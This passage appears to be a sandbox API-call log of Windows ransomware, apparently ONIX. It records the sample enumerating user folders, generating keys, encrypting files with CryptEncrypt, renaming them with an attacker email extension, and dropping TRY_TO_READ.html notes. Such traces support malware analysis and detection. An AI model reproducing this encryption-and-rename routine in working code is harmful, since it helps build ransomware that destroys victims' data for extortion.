dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x31a0, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.464] CloseHandle (hObject=0x4bc) returned 1 [0121.465] GetProcessHeap () returned 0x410000 [0121.465] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0121.465] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4urgQfY.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\4urgqfy.gif"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4urgQfY.gif.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\4urgqfy.gif.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.467] GetProcessHeap () returned 0x410000 [0121.467] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0121.467] FindNextFileW (in: hFindFile=0x48ef30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0121.467] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4bc [0121.467] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.467] LockFile (hFile=0x4bc, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1f8, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.467] SetFilePointerEx (in: hFile=0x4bc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0121.467] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.468] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0121.468] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0121.468] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini", dwFileAttributes=0x80) returned 1 [0121.468] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini") returned 51 [0121.468] GetProcessHeap () returned 0x410000 [0121.468] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd6) returned 0x44faf8 [0121.468] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini" [0121.468] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.468] GetFileSizeEx (in: hFile=0x4bc, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=504) returned 1 [0121.468] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x1f8 [0121.468] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.468] GetProcessHeap () returned 0x410000 [0121.468] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0121.468] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.468] WriteFile (in: hFile=0x4bc, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.471] WriteFile (in: hFile=0x4bc, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.472] WriteFile (in: hFile=0x4bc, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.473] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1f8) returned 0x442938 [0121.473] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1f8) returned 0x46a0f0 [0121.473] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.473] ReadFile (in: hFile=0x4bc, lpBuffer=0x442938, nNumberOfBytesToRead=0x1f8, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesRead=0x367f44c*=0x1f8, lpOverlapped=0x0) returned 1 [0121.473] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=-504, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.473] WriteFile (in: hFile=0x4bc, lpBuffer=0x46a0f0*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a0f0*, lpNumberOfBytesWritten=0x367f44c*=0x1f8, lpOverlapped=0x0) returned 1 [0121.475] UnlockFile (hFile=0x4bc, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1f8, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.475] CloseHandle (hObject=0x4bc) returned 1 [0121.475] GetProcessHeap () returned 0x410000 [0121.475] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0121.475] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.477] GetProcessHeap () returned 0x410000 [0121.477] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0121.478] FindNextFileW (in: hFindFile=0x48ef30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26c7e80, ftCreationTime.dwHighDateTime=0x1d5dd29, ftLastAccessTime.dwLowDateTime=0x98ad2ec0, ftLastAccessTime.dwHighDateTime=0x1d5e036, ftLastWriteTime.dwLowDateTime=0x98ad2ec0, ftLastWriteTime.dwHighDateTime=0x1d5e036, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="g8hH", cAlternateFileName="")) returned 1 [0121.478] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\g8hH\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\g8hh\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4bc [0121.479] FindNextFileW (in: hFindFile=0x48ef30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cd36bb0, ftCreationTime.dwHighDateTime=0x1d5dd92, ftLastAccessTime.dwLowDateTime=0xa973db10, ftLastAccessTime.dwHighDateTime=0x1d5e5f8, ftLastWriteTime.dwLowDateTime=0xa973db10, ftLastWriteTime.dwHighDateTime=0x1d5e5f8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IWWHs", cAlternateFileName="")) returned 1 [0121.479] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IWWHs\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwwhs\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4bc [0121.482] FindNextFileW (in: hFindFile=0x48ef30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328aca30, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x328aca30, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x519477f0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0121.483] FindNextFileW (in: hFindFile=0x48ef30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2168010, ftCreationTime.dwHighDateTime=0x1d5dc21, ftLastAccessTime.dwLowDateTime=0xc3b80270, ftLastAccessTime.dwHighDateTime=0x1d5e56d, ftLastWriteTime.dwLowDateTime=0xc3b80270, ftLastWriteTime.dwHighDateTime=0x1d5e56d, nFileSizeHigh=0x0, nFileSizeLow=0x117c9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZijCkTotswB.gif", cAlternateFileName="ZIJCKT~1.GIF")) returned 1 [0121.483] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZijCkTotswB.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zijcktotswb.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4bc [0121.483] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.483] LockFile (hFile=0x4bc, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x117c9, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.483] SetFilePointerEx (in: hFile=0x4bc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.483] ReadFile (in: hFile=0x4bc, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.484] SetFilePointerEx (in: hFile=0x4bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.484] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.484] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0121.484] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0121.484] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZijCkTotswB.gif", dwFileAttributes=0x80) returned 1 [0121.484] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZijCkTotswB.gif") returned 55 [0121.484] GetProcessHeap () returned 0x410000 [0121.484] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xde) returned 0x44faf8 [0121.484] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZijCkTotswB.gif" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZijCkTotswB.gif") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZijCkTotswB.gif" [0121.484] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZijCkTotswB.gif", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZijCkTotswB.gif.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZijCkTotswB.gif.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.484] GetFileSizeEx (in: hFile=0x4bc, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=71625) returned 1 [0121.484] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x117c9 [0121.484] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.484] GetProcessHeap () returned 0x410000 [0121.484] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0121.484] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.485] WriteFile (in: hFile=0x4bc, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.486] WriteFile (in: hFile=0x4bc, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.487] WriteFile (in: hFile=0x4bc, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.488] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x117c9) returned 0xf50048 [0121.489] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x117c9) returned 0xf61820 [0121.489] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.489] ReadFile (in: hFile=0x4bc, lpBuffer=0xf50048, nNumberOfBytesToRead=0x117c9, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x117c9, lpOverlapped=0x0) returned 1 [0121.493] UnlockFile (hFile=0x4bc, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x117c9, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.493] CloseHandle (hObject=0x4bc) returned 1 [0121.494] GetProcessHeap () returned 0x410000 [0121.494] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0121.494] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZijCkTotswB.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zijcktotswb.gif"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZijCkTotswB.gif.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zijcktotswb.gif.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.496] GetProcessHeap () returned 0x410000 [0121.496] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0121.496] FindNextFileW (in: hFindFile=0x48ef30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2168010, ftCreationTime.dwHighDateTime=0x1d5dc21, ftLastAccessTime.dwLowDateTime=0xc3b80270, ftLastAccessTime.dwHighDateTime=0x1d5e56d, ftLastWriteTime.dwLowDateTime=0xc3b80270, ftLastWriteTime.dwHighDateTime=0x1d5e56d, nFileSizeHigh=0x0, nFileSizeLow=0x117c9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZijCkTotswB.gif", cAlternateFileName="ZIJCKT~1.GIF")) returned 0 [0121.496] CloseHandle (hObject=0x3cc) returned 1 [0121.496] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.496] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x0, wMilliseconds=0x362)) [0121.496] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0121.496] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0121.496] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0121.497] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood9c354ca09c354b444c.lock") returned 63 [0121.497] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood9c354ca09c354b444c.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\printhood9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0121.497] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.497] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.497] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b1cf0 [0121.497] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2168010, ftCreationTime.dwHighDateTime=0x1d5dc21, ftLastAccessTime.dwLowDateTime=0xc3b80270, ftLastAccessTime.dwHighDateTime=0x1d5e56d, ftLastWriteTime.dwLowDateTime=0xc3b80270, ftLastWriteTime.dwHighDateTime=0x1d5e56d, nFileSizeHigh=0x0, nFileSizeLow=0x117c9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZijCkTotswB.gif", cAlternateFileName="ZIJCKT~1.GIF")) returned 0xffffffff [0121.498] CloseHandle (hObject=0x3cc) returned 1 [0121.498] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.498] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x0, wMilliseconds=0x372)) [0121.498] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0121.498] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0121.498] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0121.498] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Recent9c354ca09c354b444c.lock") returned 60 [0121.498] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Recent9c354ca09c354b444c.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0121.499] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.499] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.499] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x45b588 [0121.499] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2168010, ftCreationTime.dwHighDateTime=0x1d5dc21, ftLastAccessTime.dwLowDateTime=0xc3b80270, ftLastAccessTime.dwHighDateTime=0x1d5e56d, ftLastWriteTime.dwLowDateTime=0xc3b80270, ftLastWriteTime.dwHighDateTime=0x1d5e56d, nFileSizeHigh=0x0, nFileSizeLow=0x117c9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZijCkTotswB.gif", cAlternateFileName="ZIJCKT~1.GIF")) returned 0xffffffff [0121.499] CloseHandle (hObject=0x3cc) returned 1 [0121.499] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.499] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x0, wMilliseconds=0x372)) [0121.500] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0121.500] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0121.500] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0121.500] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games9c354ca09c354b444c.lock") returned 65 [0121.500] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games9c354ca09c354b444c.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0121.500] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.500] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.501] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b1cf0 [0121.501] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x328d2b90, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x328d2b90, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48ef70 [0121.501] FindNextFileW (in: hFindFile=0x48ef70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x328d2b90, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x328d2b90, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0121.501] FindNextFileW (in: hFindFile=0x48ef70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", 